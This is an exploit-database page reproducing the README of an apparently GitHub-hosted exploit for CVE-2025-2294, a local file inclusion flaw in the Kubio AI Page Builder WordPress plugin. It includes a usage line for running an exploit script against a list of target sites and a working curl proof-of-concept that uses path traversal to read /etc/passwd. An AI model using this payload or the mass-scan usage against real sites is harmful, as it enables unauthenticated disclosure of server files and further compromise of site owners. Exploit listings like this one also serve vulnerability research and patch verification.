Sploitus

Exploit for CVE-2025-2294

githubexploit Β· 2025-05-24

Exploit Code

README50 lines
## https://sploitus.com/exploit?id=AA736359-13D6-55ED-A93F-614414FF50B6
# CVE-2025-2294

# 🚨 CVE-2025-2294 - Local File Inclusion (LFI) Vulnerability in Kubio AI Page Builder for WordPress 🧱

## πŸ” Overview

**CVE-2025-2294** is a critical πŸ”₯ Local File Inclusion (LFI) vulnerability affecting the Kubio AI Page Builder plugin for WordPress (versions up to and including 2.5.1). This flaw allows **unauthenticated remote attackers** πŸ‘Ύ to include arbitrary files on the server via the `__kubio-site-edit-iframe-classic-template` URL parameter.

Exploiting this vulnerability may lead to disclosure of sensitive files πŸ“‚, remote code execution πŸ’₯, and full system compromise πŸ’€.

## πŸ‘€ Author

**Muhammad Nizar** β€” Security Researcher πŸ”  
GitHub: [0xWhoami35](https://github.com/0xWhoami35)    
YouTube: [InfoSec Insight](https://www.youtube.com/channel/UC33gQFGBqkqDE0zZNwamCgw) ▢️

---

*Feel free to reach out for questions or collaboration! 🀝*

---

## πŸ“‹ Affected Versions

- Kubio AI Page Builder plugin ≀ 2.5.1 πŸ› οΈ

---

## 🧰 Usage

Run the exploit script with a list of target URLs:

```bash
python3 lfi.py -l list.txt
```

## ⚠️ Vulnerability Details

- **Type:** Local File Inclusion (LFI) πŸ•³οΈ  
- **Severity:** Critical (CVSS 9.8) πŸ”₯  
- **Attack Vector:** Remote, unauthenticated 🌐  
- **Impact:** Confidentiality, Integrity, Availability πŸ”  

---

## πŸ§ͺ Proof of Concept (PoC)

```bash
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"